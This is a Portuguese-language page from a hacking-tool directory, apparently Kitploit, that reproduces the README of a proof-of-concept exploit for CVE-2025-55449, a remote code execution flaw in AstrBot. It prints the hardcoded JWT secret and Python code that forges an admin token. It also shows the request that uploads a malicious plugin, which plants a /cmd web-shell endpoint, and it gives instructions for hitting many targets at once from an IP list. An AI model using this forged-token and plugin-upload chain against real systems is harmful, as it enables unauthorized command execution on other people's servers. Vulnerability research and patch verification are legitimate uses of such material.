Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55449 — CVE-2025-55449 EXP | Kitploit
Ferramentas/GitHubGitHub/xhh1h/cve-2025-55449
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAutenticaçãoDesenvolvimento de Payloads
GitHubxhh1h/cve-2025-55449

CVE-2025-55449

CVE-2025-55449 EXP

Ver Repositório
34há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55449 - Vulnerabilidade de Execução Remota de Código (RCE) no AstrBot

Visão Geral

Este repositório contém uma prova de conceito de exploit para CVE-2025-55449, uma vulnerabilidade crítica de Execução Remota de Código (RCE) no AstrBot. A vulnerabilidade permite que um atacante execute código arbitrário no sistema alvo explorando autenticação JWT fraca e o mecanismo de instalação de plugins.

Descrição da Vulnerabilidade

A vulnerabilidade existe devido a:

  1. Chave Secreta JWT Hardcoded: O AstrBot usa uma chave secreta JWT hardcoded (Advanced_System_for_Text_Response_and_Bot_Operations_Tool) para autenticação, permitindo que atacantes forjem tokens de autenticação válidos.

  2. Instalação de Plugin sem Restrições: O endpoint /api/plugin/install-upload permite que usuários autenticados façam upload e instalem plugins sem validação adequada, possibilitando a execução de código Python arbitrário.

  3. Execução de Código via Sistema de Plugins: O sistema de plugins permite que plugins modifiquem as rotas da aplicação e executem comandos arbitrários através da instância Flask/Quart.

Detalhes Técnicos

Vetor de Ataque

Baixar ferramenta
  1. Falsificação de Token JWT: O exploit forja um token JWT usando a chave secreta hardcoded com privilégios de administrador.

  2. Vulnerabilidade de execução de código: A vulnerabilidade de execução remota de código no backend explora o recurso de extensão de plugins embutido na aplicação, permitindo que usuários enviem pacotes de plugins personalizados. O programa descomprime os pacotes, lê as informações do plugin, importa o arquivo Python do objeto e executa o código.

Fluxo do Exploit

root@kitploit:~
1. Forjar token JWT com a chave secreta hardcoded
2. Criar arquivo ZIP de plugin malicioso
3. POST para /api/plugin/install-upload com o token forjado
4. Plugin é instalado e adiciona o endpoint /cmd
5. Executar comandos via /cmd?cmd=<comando>

Requisitos

  • Python 3.6+
  • Pacotes Python necessários:
    • jwt (PyJWT)
    • requests
    • zipfile (nativo)
    • argparse (nativo)
    • datetime (nativo)
    • pathlib (nativo)

Instalação

  1. Clone este repositório:
root@kitploit:~
git clone <repository-url>
cd CVE-2025-55449
  1. Instale as dependências necessárias:
root@kitploit:~
pip install PyJWT requests

Uso

Alvo Único

Execute o exploit contra uma única URL alvo:

root@kitploit:~
python main.py http://target-ip:port

Múltiplos Alvos

Crie um arquivo (ip.txt) com uma URL por linha:

root@kitploit:~
http://target1:6185
http://target2:6185
http://target3:6185

Em seguida, execute:

root@kitploit:~
python main.py -r ip.txt

Exemplo de Saída

Após uma exploração bem-sucedida, o script exibirá:

root@kitploit:~
http://target-ip:port/cmd?cmd=id

Você pode então executar comandos acessando:

root@kitploit:~
http://target-ip:port/cmd?cmd=<seu-comando>

Por exemplo:

root@kitploit:~
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la

Estrutura do Projeto

root@kitploit:~
CVE-2025-55449/
├── main.py                 # Script principal do exploit
├── ip.txt                  # Arquivo de exemplo com URLs alvo
├── README.md              # Este arquivo
└── helloworld/            # Diretório do plugin malicioso
    ├── main.py            # Código do plugin que adiciona o endpoint /cmd
    ├── metadata.yaml      # Metadados do plugin
    ├── LICENSE            # Licença do plugin
    └── README.md          # README do plugin

Como Funciona

Falsificação de Token JWT

O exploit usa a chave secreta JWT hardcoded para criar um token de autenticação válido:

root@kitploit:~
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")

Plugin Malicioso

O plugin (helloworld/main.py) explora o sistema de importação do Python e a instância da aplicação Flask/Quart para injetar uma nova rota:

root@kitploit:~
# O plugin localiza a instância da aplicação Quart e adiciona uma rota /cmd
# que executa comandos arbitrários via os.popen()

Upload do Plugin

O exploit empacota o plugin como um arquivo ZIP e o envia através do endpoint autenticado:

root@kitploit:~
requests.post(
    url + "/api/plugin/install-upload",
    headers={"Authorization": "Bearer " + forged},
    files={"file": (name + ".zip", zip_payload_bytes)}
)